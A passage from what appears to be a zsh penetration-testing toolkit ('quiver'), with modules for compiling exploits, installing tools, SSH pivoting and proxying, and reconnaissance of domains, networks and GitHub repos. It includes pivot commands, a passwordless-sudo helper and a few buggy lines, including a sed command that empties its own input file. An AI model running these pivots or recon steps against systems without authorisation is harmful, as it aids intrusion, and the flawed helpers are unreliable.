"hakrawler -url "${__URL}" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt" } ================================================ FILE: modules/qq-exploit.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-exploit ############################################################# qq-exploit-help() { cat << "DOC" qq-exploit ---------- The exploit namespace provides commands that assist with compilation and cross-compilation commands for exploits. Commands -------- qq-exploit-install: installs dependencies qq-exploit-searchsploit-nmap: use searchsploit with an nmap xml results file qq-exploit-compile-gcc: compile a linux exploit qq-exploit-compile-gcc-32: compile a linux 32 exploit on 64 qq-exploit-compile-c-win32: cross compile a C win32 exploit qq-exploit-compile-c-win64: cross compile a C wind64 exploit qq-exploit-compile-c++-win32: cross compile a C++ win32 exploit qq-exploit-compile-c++-win64: cross compile a C++ win64 exploit DOC } qq-exploit-install() { __info "Running $0..." sudo dpkg --add-architecture i386 sudo apt-get update __pkgs exploitdb __pkgs mingw-w64 gcc gcc-multilib g++-multilib } qq-exploit-searchsploit-nmap() { __check-project __ask "Select nmap xml scan results file" local f && __askpath f FILE ${__PROJECT} print -z "searchsploit -x --nmap ${f}" } qq-exploit-compile-gcc() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "gcc -o ${out} ${src}" } qq-exploit-compile-gcc-32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "gcc -m32 -o ${out} ${src}" } qq-exploit-compile-c-win32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "i686-w64-mingw32-gcc ${src} -o ${out}" } qq-exploit-compile-c-win64() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "x86_64-w64-mingw32-gcc ${src} -o ${out}" } qq-exploit-compile-c++-win32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "i686-w64-mingw32-g++ ${src} -o ${out}" } qq-exploit-compile-c++-win64() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "x86_64-w64-mingw32-g++ ${src} -o ${out}" } qq-exploit-compile-notes-winsock() { __info "use -lws2_32" } qq-exploit-compile-notes-static() { __info "-static-libstdc++" __info "-static-libgcc" } ================================================ FILE: modules/qq-install.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-install ############################################################# qq-install-help() { cat << "DOC" qq-install ---------- The qq-install namespace provides commands that assist with installing packages, repos and tools used in quiver. Commands -------- qq-install-all: Installs all dependecies in all modules, calling qq-*-install qq-install-git-pull-tools: Updates all install tools that are git repos qq-install-dev: Installs pyhton3, php, npm and libraries qq-install-essentials: Installs useful utilities qq-install-golang: Installs golang and environment variables needed for "go get" Tools ----- These installers are for individual tools. qq-install-wordlist-commonspeak qq-install-wordlist-nerdlist qq-install-massdns qq-install-github-search qq-install-s3scanner qq-install-git-secrets qq-install-gitrob qq-install-pentest-tools qq-install-protonvpn qq-install-nmap-elasticsearch-nse qq-install-link-finder qq-install-bat DOC } ##### Helpers __addpath() { echo "export PATH=\$PATH:$1" | tee -a ~/.zshrc export PATH=$PATH:$1 } __pkgs(){ __info "checking for and installing dependencies..." for pkg in "$@" do __info "$pkg" dpkg -l | grep -qw $pkg && __warn "already installed" || sudo apt-get -y install $pkg done } qq-install-all() { __cyan "This will install/update all modules." __cyan "Ensure you have free disk space before proceeding." __ask "CONTINUE?" if __check-proceed then __info "Installing all modules..." #qq-encoding-install qq-enum-dhcp-install qq-enum-dns-install qq-enum-ftp-install qq-enum-host-install qq-enum-kerb-install qq-enum-ldap-install qq-enum-mssql-install qq-enum-mysql-install qq-enum-network-install qq-enum-nfs-install qq-enum-oracle-install qq-enum-pop3-install qq-enum-rdp-install qq-enum-smb-install qq-enum-web-aws-install qq-enum-web-dirs-install qq-enum-web-elastic-install qq-enum-web-fuzz-install qq-enum-web-js-install qq-enum-web-vuln-install qq-enum-web-php-install qq-enum-web-ssl-install qq-enum-web-install qq-exploit-install #qq-kali-install qq-notes-install qq-log-install qq-pivot-install qq-project-install qq-recon-domains-install qq-recon-github-install qq-recon-networks-install qq-recon-org-install qq-recon-subs-install qq-shell-handlers-msf-install qq-shell-handlers-install #qq-shell-tty-install qq-srv-install __info "Install finished" fi } qq-install-git-pull-tools() { __cyan "This will git-pull all repos in ${__TOOLS}." __ask "CONTINUE?" if __check-proceed then cd ${__TOOLS} for d in $(ls -d */) do cd $d __ok "Pulling ${d}" git pull cd - done cd ${__TOOLS} fi } qq-install-dev(){ __cyan "This will python3, php, npm and libraries." __ask "CONTINUE?" if __check-proceed then __pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm fi } qq-install-essentials(){ __cyan "This common utilities such as jq, tmux, tree, dtach and more." __ask "CONTINUE?" if __check-proceed then __pkgs jq pigz fonts-powerline unzip tmux dtach tree fi } ##### Individual Tools qq-install-golang() { __pkgs golang if [[ -z "$(echo $GOPATH)" ]] then echo "export GOPATH=\$HOME/go" | tee -a $HOME/.zshrc echo "export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin" | tee -a $HOME/.zshrc export GOPATH=$HOME/go export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin fi } qq-install-node() { __pkgs nodejs npm cd $HOME mkdir -p $HOME/.npm-global npm config set prefix '~/.npm-global' if ! $(echo $PATH | grep -q "npm-global") then echo "export PATH=\$PATH:\$HOME/.npm-global" | tee -a $HOME/.zshrc export PATH=$PATH:$HOME/.npm-global fi } qq-install-wordlist-commonspeak() { local name="commonspeak2" local url="https://github.com/assetnote/commonspeak2-wordlists.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-wordlist-nerdlist() { local name="nerdlist" local url="https://github.com/tarahmarie/nerdlist.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-massdns() { local name="massdns" local url="https://github.com/blechschmidt/massdns.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p make popd __addpath $p/bin else __warn "already installed in $p" pushd $p git pull make popd fi } qq-install-github-search() { local name="github-search" local url="https://github.com/gwen001/github-search.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p pip3 install -r requirements.txt popd __addpath $p else __warn "already installed in $p" pushd $p git pull pip3 install -r requirements.txt popd fi } qq-install-s3scanner() { local name="S3Scanner" local url="https://github.com/sa7mon/S3Scanner.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p pip3 install -r requirements.txt popd __addpath $p else __warn "already installed in $p" pushd $p git pull pip3 install -r requirements.txt popd fi } qq-install-gf() { local name="gf" __info "$name" go get -u github.com/tomnomnom/gf echo "source \$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh" >> $HOME/.zshrc cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf } qq-install-git-secrets() { local name="git-secrets" local url="https://github.com/awslabs/git-secrets.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p sudo make install popd __addpath $p else __warn "already installed in $p" pushd $p git pull sudo make install popd fi } qq-install-gitrob() { local name="gitrob" __info "$name" go get -u github.com/golang/dep/cmd/dep go get -u github.com/codeEmitter/gitrob pushd ~/go/src/github.com/codeEmitter/gitrob dep ensure go build popd } qq-install-pentest-tools() { local name="pentest-tools" local url="https://github.com/gwen001/pentest-tools.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands __addpath $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-protonvpn() { local name="protonvpn" __info "$name" sudo apt install -y openvpn dialog python3-pip python3-setuptools sudo pip3 install protonvpn-cli __warn "ProtonVPN username and password required" print -z "sudo protonvpn init" } qq-install-nmap-elasticsearch-nse() { local name="nmap-elasticsearch-nse" local url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p sudo cp elasticsearch.nse /usr/share/nmap/scripts/ popd else __warn "already installed in $p" pushd $p git pull sudo cp elasticsearch.nse /usr/share/nmap/scripts/ popd fi } qq-install-link-finder() { local name="LinkFinder" local url="https://github.com/GerbenJavado/LinkFinder.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p sudo python3 setup.py install pip3 install -r requirements.txt popd else __warn "already installed in $p" pushd $p git pull python3 setup.py install pip3 install -r requirements.txt popd fi } qq-install-bat() { local name="bat" __info "$name" cd $HOME wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb sudo dpkg -i bat_0.15.0_amd64.deb rm bat_0.15.0_amd64.deb cd - } ================================================ FILE: modules/qq-kali.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-kali ############################################################# qq-kali-help() { cat << "DOC" qq-kali ---------- The qq-kali namespace provides commands that assist with managing Kali linux. Commands -------- qq-kali-pkg-upgrade: update and full-upgrade with autoremove qq-kali-pkg-query: query if a package is installed or not qq-kali-pkg-fix: fix broken packages qq-kali-pkg-go-update: update go modules and packages with go get qq-kali-fs-mounted: show mounted file systems qq-kali-fs-usage: show file system usage totals qq-kali-fs-last3: show files modified in last 3 days in /etc qq-kali-fs-large: show files larger than 1GB in the root fs qq-kali-mem-top10: show top10 processes by memory usage qq-kali-mem-free: show overall memory usage qq-kali-disk-top10: show top 10 files by size in current directory qq-kali-ps-tree: show a process tree qq-kali-ps-grep: search list of processes qq-kali-ps-dtach: run a script in the background qq-kali-net-watch: display network active connections qq-kali-net-open4: display open network connections ipv4 qq-kali-net-open6: display open network connections ipv6 qq-kali-net-routes: display the system routing table qq-kali-net-ss: display open network connections qq-kali-net-lsof: display open network connections qq-kali-net-pubip: query for the public IP qq-kali-pvpn-update: install or update proton vpn cli qq-kali-pvpn-status: check proton vpn status qq-kali-pvpn-connect-tcp: connect to proton vpn using tcp qq-kali-pvpn-connect-udp: connect to proton vpn using udp qq-kali-pvpn-disconnect: disconnect proton vpn qq-kali-path-add: add a new path to the PATH environment variable qq-kali-file-replace: replace an existing value in a file qq-kali-file-dos-to-unix: convert file with dos endings to unix qq-kali-file-unix-to-dos: convert file with unix endings to dos qq-kali-file-sort-uniq: sort a file uniq in place qq-kali-file-sort-uniq-ip: sort a file of IP addresses uniq in place qq-kali-sudoers-easy: removes the requirment for sudo for common commands like nmap qq-kali-sudoers-harden: removes sudo exclusions DOC } qq-kali-pkg-upgrade() { print -z "sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove" } qq-kali-pkg-query() { local query && __askvar query PACKAGE for pkg in "${query}" do dpkg -l | grep -qw $pkg && __ok "${pkg} is installed" || __warn "${pkg} not installed" done } qq-kali-pkg-fix() { print -z "sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update" } qq-kali-pkg-go-update() { print -z "go get -u all" } qq-kali-fs-mounted() { print -z "sudo mount | column -t" } qq-kali-fs-usage() { print -z "df -mTh --total" } qq-kali-fs-last3() { print -z "sudo find /etc -mtime -3" } qq-kali-fs-large() { print -z "sudo find / -type f -size +1G" } qq-kali-mem-top10() { print -z "sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \$4,\$11}' " } qq-kali-mem-free() { print -z "free -th" } qq-kali-disk-top10() { print -z "sudo du -sk ./* | sort -r -n | head -10" } qq-kali-ps-tree() { print -z "ps auxf" } qq-kali-ps-grep() { local query && __askvar query QUERY print -z "ps aux | grep -v grep | grep -i -e VSZ -e ${query}" } qq-kali-ps-dtach() { __ask "Enter full path to script to run dtach'd" local p && __askpath p PATH $(pwd) dtach -A ${p} /bin/zsh } qq-kali-net-watch() { print -z "sudo watch -n 0.3 'netstat -pantlu4 | grep \"ESTABLISHED\|LISTEN\"' " } qq-kali-net-open4() { print -z "sudo netstat -pantlu4"} qq-kali-net-open6() { print -z "sudo netstat -pantlu6"} qq-kali-net-routes() { print -z "netstat -r --numeric-hosts" } qq-kali-net-ss() { print -z "sudo ss -plaunt4" } qq-kali-net-lsof() { print -z "sudo lsof -P -i -n "} qq-kali-net-pubip() { print -z "curl -s \"https://icanhazip.com\" "} qq-kali-pvpn-update() { print -z "sudo pip3 install protonvpn-cli --upgrade" } qq-kali-pvpn-status() { print -z "sudo protonvpn status" } qq-kali-pvpn-connect-tcp() { print -z "sudo protonvpn c -f" } qq-kali-pvpn-connect-udp() { print -z "sudo protonvpn c -f -p udp" } qq-kali-pvpn-disconnect() { print -z "sudo protonvpn disconnect" } qq-kali-path-add() { __ask "Enter new path to append to current PATH" local p && __askpath p PATH / print -z "echo \"export PATH=\$PATH:${p}\" | tee -a $HOME/.zshrc" } qq-kali-file-replace() { local replace && __askvar replace REPLACE local with && __askvar with WITH local file && __askpath file FILE $(pwd) print -z "sed 's/${replace}/${with}/g' ${file} > ${file}" } qq-kali-file-dos-to-unix() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "tr -d \"\015\" < ${file} > ${file}.unix" } qq-kali-file-unix-to-dos() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "sed -e 's/$/\r/' ${file} > ${file}.dos" } qq-kali-file-sort-uniq() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "cat ${file} | sort -u -o ${file}" } qq-kali-file-sort-uniq-ip() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "cat ${file} | sort -u | sort -V -o ${file}" } qq-kali-sudoers-easy() { __warn "This is dangerous for OPSEC! Remove when done." print -z "echo \"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\" | sudo tee /etc/sudoers.d/$(whoami)" } alias easymode="qq-bounty-sudoers-easy" qq-kali-sudoers-harden() { print -z "sudo rm /etc/sudoers.d/$(whoami)" } alias hardmode="qq-bounty-sudoers-harden" ================================================ FILE: modules/qq-log.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-log ############################################################# qq-log-help() { cat << "DOC" qq-log ------------- The log namespace provides commands that create a logbook in a directory specified by the __LOGBOOK variable. Use qq-log to append entries to the logbook. Display the log with qq-log-cat. Edit the log with qq-log-edit. Commands -------- qq-log-install: installs dependencies qq-log: alias ql, appends $@ to an entry in the logbook qq-log-cat: alias qlc, cats the logbook qq-log-edit: alias qle, edits the logbook using $EDITOR qq-log-set: creates or uses existing logbook.md in the path specified DOC } qq-log-install() { __info "Running $0..." qq-install-golang go get -u github.com/charmbracelet/glow } qq-log-set() { qq-vars-set-logbook } alias qls="qq-log-set" qq-log-cat() { __check-logbook __info "${__LOGBOOK}" glow ${__LOGBOOK} } alias qlc="qq-log-cat" qq-log-edit() { __check-logbook $EDITOR ${__LOGBOOK} } alias qle="qq-log-edit" qq-log() { __check-logbook local stamp=$(date +'%m-%d-%Y : %r') echo "## ${stamp}" >> ${__LOGBOOK} echo "\`\`\`" >> ${__LOGBOOK} echo "$@" >> ${__LOGBOOK} echo "\`\`\`" >> ${__LOGBOOK} echo " " >> ${__LOGBOOK} } alias ql="qq-log" ================================================ FILE: modules/qq-notes.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-notes ############################################################# qq-notes-help() { cat << "DOC" qq-notes ------- The notes namespace provides searching and reading of markdown notes that are stored in a directory specified by the __NOTES environment variable (qq-vars-global). Commands -------- qq-notes-install: installs dependencies qq-notes: lists all notes in $__NOTES or searches notes by filename if $1 is supplied qq-notes-content: list all notes in $__NOTES or searches notes by content if $1 is supplied qq-notes-menu: display an interactive menu for reading notes DOC } qq-notes-install() { __info "Running $0..." __pkgs fzf ripgrep qq-install-golang go get -u github.com/charmbracelet/glow qq-install-bat } qq-notes() { __notes-check __info "Use \$1 to search file names" select note in $(ls -R --file-type ${__NOTES} | grep -ie ".md$" | grep -i "$1") do test -n ${note} && break exit done [[ ! -z ${note} ]] && glow ${__NOTES}/${note} } qq-notes-content() { __notes-check __info "Use \$1 to search content" select note in $(grep -rliw "$1" ${__NOTES}/*.md) do test -n ${note} && break exit done [[ ! -z ${note} ]] && glow ${note} } qq-notes-menu() { __notes-check pushd ${__NOTES} &> /dev/null rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 "" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always ${1}' popd &> /dev/null } ================================================ FILE: modules/qq-pivot.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-pivot ############################################################# qq-pivot-help() { cat << "DOC" qq-pivot ------------ The pivot namespace provides commands for using ssh to proxy and pivot. Commands -------- qq-pivot-install: installs dependencies qq-pivot-mount-remote-sshfs: mounts a remote directory to local /mnt path using sshfs qq-pivot-ssh-dynamic-proxy: uses remote as a dynamic proxy qq-pivot-ssh-remote-to-local: forwards remote port to local port qq-pivot-ssh-remote-to-local-burp: forwards remote port 8080 to local port 8080 DOC } qq-pivot-install() { __info "Running $0..." __pkgs sshfs rsync } qq-pivot-mount-remote-sshfs() { __check-user local lm && __askpath lm LMOUNT /mnt local rm && __askvar rm RMOUNT / qq-vars-set-rhost mkdir -p ${lm} print -z "sshfs ${__USER}@${__RHOST}:${rm} ${lm}" } qq-pivot-ssh-dynamic-proxy() { __check-user qq-vars-set-rhost qq-vars-set-lport print -z "ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}" } qq-pivot-ssh-remote-to-local() { __check-user qq-vars-set-rhost qq-vars-set-rport qq-vars-set-lport print -z "ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}" } qq-pivot-ssh-remote-to-local-burp() { __check-user qq-vars-set-rhost print -z "ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}" } ================================================ FILE: modules/qq-project-custom.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-project-custom ############################################################# qq-project-custom-help() { cat << "DOC" qq-project-custom ----------------- The qq-project-custom namespace provides commands to setup custom project directory structures and variables for users that have specific requirements. Variables --------- __PROJECT_ZD_CONSULTANT: a global variable for consultant name used in ZD projects __PROJECT_ZD_ROOT: a global variable for the project root folder used in ZD projects Commands -------- qq-project-custom-zd-start: scaffolds directory structure and logbook for "zd" projects qq-project-custom-zd-end: zips and removes directories and data for "zd" projects qq-project-custom-zd-root-set: sets the __PROJECT_ZD_ROOT variable qq-project-custom-zd-consultant-set: sets the __PROJECT_ZD_CONSULTANT variable DOC } export __PROJECT_ZD="" export __PROJECT_ZD_CONSULTANT="$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)" export __PROJECT_ZD_ROOT="$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)" __check-project-zd() { if [[ -z $__PROJECT_ZD_CONSULTANT ]] then qq-project-custom-zd-root-set fi if [[ -z $__PROJECT_ZD_ROOT ]] then qq-project-custom-zd-consultant-set fi } qq-project-custom-zd-root-set() { __warn "Enter the full path to the root folder of your projects." __prefill __PROJECT_ZD_ROOT DIR $HOME echo "${__PROJECT_ZD_ROOT}" > ${__GLOBALS}/PROJECT_ZD_ROOT } qq-project-custom-zd-consultant-set() { __warn "Enter consultant name below." __askvar __PROJECT_ZD_CONSULTANT NAME echo "${__PROJECT_ZD_CONSULTANT}" > ${__GLOBALS}/PROJECT_ZD_CONSULTANT } qq-project-custom-zd-start() { __check-project-zd local pid && __askvar pid "PROJECT ID" local pname && __askvar pname "PROJECT NAME" local fname="${pid}-${pname}-${__CONSULTANT_NAME// /}" local fullpath=${__PROJECT_ROOT}/${fname} #scaffold mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output} #set project to be tool-output __PROJECT=${fullpath}/tool-output # wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work local setlog && read "setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color " case "$setlog" in y|Y ) qq-log-set ;; n|N ) echo "no" ;; * ) echo "" ;; esac } qq-project-custom-zd-end() { __check-project-zd __ask "Select a project folder: " local pd=$(__menu $(find $__PROJECT_ROOT -mindepth 1 -maxdepth 1 -type d)) __ok "Selected: ${pd}" # Task 1: delete all empty folders local df && read "df?$fg[cyan]Delete empty folders? (Y/n)?:$reset_color " if [[ "$df" =~ ^[Yy]$ ]] then find ${pd} -type d -empty -delete __ok "Empty folders deleted." fi # Task 2: create tree cd ${pd} tree -C -F -H ./ > ${pd}/tree.html [[ -f "${pd}/tree.html" ]] && __ok "Created ${pd}/tree.html." || __err "Failed creating ${pd}/tree.html" cd - > /dev/null 2>&1 # Task 3: zip up engagement folder local zf=$(basename ${pd}) 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1 [[ -f ${__PROJECT_ROOT}/${zf}.7z ]] && __ok "Zipped files into ${__PROJECT_ROOT}/${zf}.7z." || __err "Failed to zip ${pd}" # Task 4: Delete engagement folder local rmp && read "rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color " if [[ "${rmp}" =~ ^[Yy]$ ]] && print -z "rm -rf ${pd}" __ok "Project ended." } ================================================ FILE: modules/qq-project.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-project ############################################################# qq-project-help() { cat << "DOC" qq-project ---------- The project namespace provides commands that help with setting up scope for an engagement or bug bounty, as well as commands for syncing data and managing a VPS. Commands -------- qq-project-install: installs dependencies qq-project-scope: generate a scope regex by root word (matches all to the left and right) qq-project-rescope-txt: uses rescope to generate scope from a url qq-project-rescope-burp: uses rescope to generate burp scope (JSON) from a url qq-project-sync-remote-to-local: sync data from a remote server directory to a local directory using SSHFS qq-project-sync-local-file-to-remote: sync a local file to a remote server using rsync over SSH qq-project-google-domain-dyn: update IP address using Google domains hosted dynamic record DOC } qq-project-install() { __info "Running $0..." __pkgs fusermount sshfs rsync curl qq-install-golang go get -u github.com/root4loot/rescope } qq-project-scope() { __check-project __check-org print -z "echo \"^.*?${__ORG}\..*\$ \" >> ${__PROJECT}/scope.txt" } qq-project-rescope-burp() { __check-project __ask "Enter the URL to the bug bounty scope description" qq-vars-set-url mkdir -p ${__PROJECT}/burp print -z "rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json" } qq-project-sync-remote-to-local() { __warn "Enter your SSH connection username@remote_host" local ssh && __askvar ssh SSH __warn "Enter the full remote path to the directory your want to copy from" local rdir && __askvar rdir "REMOTE DIR" __warn "Enter the full local path to the directory to use as a mount point" local mnt && __askpath mnt "LOCAL MOUNT" /mnt __warn "Enter the full local path to the directory to sync the data to" local ldir && __askpath lidr "LOCAL DIR" $HOME sudo mkdir -p $mnt __ok "Mounting $rdir to $mnt ..." sudo sshfs ${ssh}:${rdir} ${mnt} __ok "Syncing data from $mnt to $ldir ..." sudo rsync -avuc ${mnt} ${ldir} __ok "Unmounting $mnt. ..." sudo fusermount -u ${mnt} __ok "Sync Completed" } qq-project-sync-local-file-to-remote() { __warn "Enter your SSH connection username@remote_host" local ssh && __askvar ssh SSH __warn "Enter the full local path to the file you want to copy to your remote server" local lfile && __askpath lfile "LOCAL FILE" $HOME __warn "Enter the full remote path to the directory your want to copy the file to" local rdir && __askvar rdir "REMOTE DIR" print -z "rsync -avz -e \"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" --progress $lfile $ssh:$rdir" } qq-project-google-domain-dyn() { local u && __askvar u USERNAME local p && __askvar p PASSWORD local d && __askvar d DOMAIN qq-vars-set-lhost print -z "curl -s -a \"${__UA}\" https://$u:$p@domains.google.com/nic/update?hostname=${d}&myip=${__LHOST} " } ================================================ FILE: modules/qq-recon-domains.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-domains ############################################################# qq-recon-domains-help() { cat << "DOC" qq-recon-domains ------------- The recon-domains namespace provides commands to recon horizontal domains of a root domain. All domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass. You can sort unique this file in place with the "sfu" alias. Commands -------- qq-recon-domains-install: installs dependencies qq-recon-domains-amass-whois: find domains with whois qq-recon-domains-amass-asn: find domains by asn DOC } qq-recon-domains-install() { __info "Running $0..." __pkgs amass } qq-recon-domains-amass-whois() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/amass mkdir -p ${__PROJECT}/domains print -z "amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt" } qq-recon-domains-amass-asn() { __check-project __check-asn mkdir -p ${__PROJECT}/amass mkdir -p ${__PROJECT}/domains print -z "amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt" } ================================================ FILE: modules/qq-recon-github.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-github ############################################################# qq-recon-github-help() { cat << "DOC" qq-recon-github ------------ The recon-github namespace provides commands for the recon of github repos. All output will be stored under $__PROJECT/source Commands -------- qq-recon-github-install: installs dependencies qq-recon-github-user-repos: uses curl to get a list of repos for a github user qq-recon-github-endpoints: gets a list of urls from all repos of a domain on github qq-recon-github-gitrob: clones (in mem) repos and searches for github dorks qq-recon-github-api-set: set github API key global variable DOC } qq-recon-github-install() { __info "Running $0..." __pkgs curl jq python3 qq-install-golang qq-install-github-search qq-install-git-secrets qq-install-gitrob } qq-recon-github-user-repos() { __check-project __check-user mkdir -p ${__PROJECT}/source print -z "curl -s \"https://api.github.com/users/${__USER}/repos?per_page=1000\" | jq '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt " } qq-recon-github-endpoints() { __check-api-github __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/source print -z "github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt " } qq-recon-github-gitrob() { __check-api-github __check-project __check-user local d=${__PROJECT}/source/${__USER} mkdir -p $d cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d __info "Gitrob UI: http://127.0.0.1:9393/" print -z "pushd $d ;gitrob -in-mem-clone -save \"$d/output.json\" -github-access-token $__API_GITHUB ${__USER} && popd" } ================================================ FILE: modules/qq-recon-networks.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-networks ############################################################# qq-recon-networks-help() { cat << "DOC" qq-recon-networks ------------- The recon-networks namespace provides commands to recon ASNs and IP networks for an organization. All network data is stored in $__PROJECT/networks. Commands -------- qq-recon-networks-install: installs dependencies qq-recon-networks-amass-asn: find asns by domain qq-recon-networks-bgp: use the bgp.he.net website to find asns and networks qq-recon-networks-bgpview-ipv4: curl api.bgpview.io for ipv4 networks by asn qq-recon-networks-bgpview-ipv6: curl api.bgpview.io for ipv6 networks by asn DOC } qq-recon-networks-install() { __info "Running $0..." __pkgs curl jq amass } qq-recon-networks-bgp() { __info "Search https://bgp.he.net/" } qq-recon-networks-amass-asns() { __check-project __check-org mkdir ${__PROJECT}/networks print -z "amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt " } qq-recon-networks-bgpview-ipv4() { __check-project __check-asn mkdir ${__PROJECT}/networks print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt" } qq-recon-networks-bgpview-ipv6() { __check-project __check-asn mkdir ${__PROJECT}/networks print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv6.txt" } ================================================ FILE: modules/qq-recon-org.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-org ############################################################# qq-recon-org-help() { cat << "DOC" qq-recon-org ------------ The recon namespace provides commands for the recon of an organization. Data from commands will be stored in $__PROJECT/recon. Commands -------- qq-recon-org-install: installs dependencies qq-recon-org-files-metagoofil: uses metagoofil to search and download files for a domain qq-recon-org-wordlist-cewl: uses cewl to create a custom wordlist from a url qq-recon-org-theharvester: uses theHarvester to mine data about a target domain DOC } qq-recon-org-install() { __info "Running $0..." __pkgs whois metagoofil cewl theharvester } qq-recon-org-files-metagoofil() { __check-project __check-ext-docs qq-vars-set-domain mkdir -p ${__PROJECT}/recon/files print -z "metagoofil -u \"${__UA}\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files" } qq-recon-org-files-urls() { __check-project qq-vars-set-domain print -z "strings * | gf urls | grep $__DOMAIN | tee -a ${__PROJECT}/recon/urls.txt" } qq-recon-org-wordlist-by-url-cewl() { __check-project qq-vars-set-url mkdir -p ${__PROJECT}/recon print -z "cewl -a -d 3 -m 5 -u \"${__UA}\" -w ${__PROJECT}/recon/cewl.txt ${__URL}" } qq-recon-org-theharvester() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/recon print -z "theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt" } qq-recon-org-cse() { __info "Use 